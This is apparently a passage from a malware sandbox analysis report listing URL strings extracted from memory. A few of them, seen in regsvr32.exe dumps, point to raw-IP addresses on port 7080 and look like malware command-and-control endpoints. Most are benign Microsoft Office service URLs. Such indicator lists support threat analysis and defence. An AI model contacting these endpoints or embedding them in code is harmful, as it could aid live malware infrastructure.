Source: regsvr32.exe, 0000000A.00000003.2012257870.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416063327.0000000000C34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012912551.0000000000C36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://182.162.143.56/tkafmhcgcid//~G
Source: regsvr32.exe, 0000000A.00000003.1927414494.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.1927895860.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.63.99.23:7080/
Source: regsvr32.exe, 0000000A.00000003.1927414494.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.63.99.23:7080/2
Source: regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.63.99.23:7080/b
Source: regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2004490975.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.63.99.23:7080/qqvehgyxm/bitss/ktcpnaio/
Source: regsvr32.exe, 0000000C.00000003.2004490975.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.63.99.23:7080/qqvehgyxm/bitss/ktcpnaio/%
Source: regsvr32.exe, 0000000A.00000003.1927257389.0000000000C31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.63.99.23:7080/tkafmhcgcid/
Source: regsvr32.exe, 0000000A.00000003.1927693196.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.63.99.23:7080/tkafmhcgcid/8eM
Source: regsvr32.exe, 0000000A.00000003.1927257389.0000000000C31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.63.99.23:7080/tkafmhcgcid/~G
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://api.aadrm.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://api.cortana.ai
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://api.office.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://api.onedrive.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://api.scheduler.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://augloop.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://cdn.entity.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://cortana.ai
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://cortana.ai/api
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://cr.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://directory.services.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601292631425
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://fpastorage.cdn.office.net/%s
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://fpastorage.cdn.office.net/firstpartyapp/addins.xml
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://graph.windows.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://graph.windows.net/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://invites.office.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://login.windows.local
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://management.azure.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://management.azure.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://messaging.action.office.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://messaging.engagement.office.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://messaging.lifecycle.office.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://messaging.office.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://my.microsoftpersonalcontent.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://officeapps.live.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://onedrive.live.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://osi.office.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://outlook.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://outlook.office.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://outlook.office365.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://roaming.edog.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://settings.outlook.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://tasks.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
